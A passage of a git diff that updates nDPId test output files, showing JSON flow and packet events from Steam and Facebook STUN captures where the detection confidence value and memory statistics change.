{"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165425,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164986,"flow_last_seen":1357332165166,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165088,"flow_last_seen":1357332165279,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164937,"flow_last_seen":1357332165121,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165520,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165038,"flow_last_seen":1357332165230,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164737,"flow_last_seen":1357332164925,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164693,"flow_last_seen":1357332164876,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165087,"flow_last_seen":1357332165270,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165237,"flow_last_seen":1357332165424,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164836,"flow_last_seen":1357332165015,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164693,"flow_last_seen":1357332164892,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","packets-captured":104,"packets-processed":104,"total-skipped-flows":0,"total-l4-payload-len":4652,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":55,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":55,"total-idle-flows":55,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":264,"global_ts_msec":1357332165983} 
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 104/104 @@ -270,9 +270,9 @@ ~~ total active/idle flows...: 55/55 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5929699 bytes -~~ total memory freed........: 5929699 bytes -~~ total allocations/frees...: 118434/118434 +~~ total memory allocated....: 6063333 bytes +~~ total memory freed........: 6063333 bytes +~~ total allocations/frees...: 121196/121196 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 681 chars diff --git a/test/results/steam_datagram_relay_ping.pcapng.out b/test/results/steam_datagram_relay_ping.pcapng.out index 2e194f4ac..2aa78b493 100644 --- a/test/results/steam_datagram_relay_ping.pcapng.out +++ b/test/results/steam_datagram_relay_ping.pcapng.out 
@@ -2,9 +2,9 @@ 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1625599888890} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625599888890,"flow_last_seen":1625599888890,"flow_idle_time":200000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1300,"flow_avg_l4_payload_len":1300,"midstream":0,"thread_ts_msec":1625599888890,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02194{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625599888890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1342,"pkt_l4_len":1308,"thread_ts_msec":1625599888890,"pkt":"eJS0JASgYDjgxTWgCABFAAUwjsUAAH8RmLPAqAJkiy3BCsu9aYoFHNuQAQFzZHBpbmeh3CnjmWUAAAAAAAA\/AQAAk6QtixMMCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625599888890,"flow_last_seen":1625599888890,"flow_idle_time":200000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1300,"flow_avg_l4_payload_len":1300,"midstream":0,"thread_ts_msec":1625599888890,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625599888890,"flow_last_seen":1625599888890,"flow_idle_time":200000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1300,"flow_avg_l4_payload_len":1300,"midstream":0,"thread_ts_msec":1625599888890,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
02194{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1625599891412,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1342,"pkt_l4_len":1308,"thread_ts_msec":1625599891412,"pkt":"eJS0JASgYDjgxTWgCABFAAUwjsYAAH8RmLLAqAJkiy3BCsu9aYoFHPISAQFzZHBpbmdkWlDjmWUAAAAAAAA\/AQAAk6QtixMMCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625599888890,"flow_last_seen":1625599891412,"flow_idle_time":200000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2600,"flow_avg_l4_payload_len":1300,"midstream":0,"thread_ts_msec":1625599891412,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625599888890,"flow_last_seen":1625599891412,"flow_idle_time":200000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2600,"flow_avg_l4_payload_len":1300,"midstream":0,"thread_ts_msec":1625599891412,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":2600,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1625599891412} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869501 bytes -~~ total memory freed........: 5869501 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6003135 bytes +~~ total memory freed........: 6003135 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 483 chars ~~ json string max len.......: 2199 chars diff --git a/test/results/stun_facebook.pcapng.out b/test/results/stun_facebook.pcapng.out index 5557826b4..66d70a504 100644 --- a/test/results/stun_facebook.pcapng.out +++ b/test/results/stun_facebook.pcapng.out 
@@ -3,9 +3,9 @@ 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1629291451242,"flow_last_seen":1629291451242,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1629291451242,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1629291451242,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1629291451242,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4VYJAAEARop7AqAypHw1WNpTrnEMAJO1IAAMACCESpEJBSzdRUHlQSzlldVYAGQAEEQAAAA=="} 00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1629291451254,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1629291451254,"pkt":"mt9Y+uvcCL6sCxduCABFAACER+pAAFURmuofDVY2wKgMqZxDlOsAcMgPARMAVCESpEJBSzdRUHlQSzlldVYACQAQAAAEAXVuYXV0aG9yaXplZAAVAChiYjAzMWQ2MWNjYzFiZTgyZTI0MDE0NDM1ZWQ1MmYyNmZiYTYyNDgzABQAD3R1cm5lci5mYWNlYm9vawA="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1629291451242,"flow_last_seen":1629291451254,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1629291451254,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.FacebookVoip","breed":"Acceptable","category":"VoIP"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1629291451242,"flow_last_seen":1629291451254,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1629291451254,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.FacebookVoip","breed":"Acceptable","category":"VoIP"}} 
00626{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1629291451258,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1629291451258,"pkt":"CL6sCxdumt9Y+uvcCABFAACkVYNAAEARojHAqAypHw1WNpTrnEMAkHyWAAMAdCESpEI1elVqTVhIdmV3K3MAGQAEEQAAAAAGABBNZjJoOUhpNWFQTVJwbEYxABQAD3R1cm5lci5mYWNlYm9vawAAFQAoYmIwMzFkNjFjY2MxYmU4MmUyNDAxNDQzNWVkNTJmMjZmYmE2MjQ4MwAIABSHhqaIN2rgJVJbblyGsNjNga5wAA=="} -00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":75,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1629291451242,"flow_last_seen":1629291461336,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":7404,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1629291461336,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.FacebookVoip","breed":"Acceptable","category":"VoIP"}} 
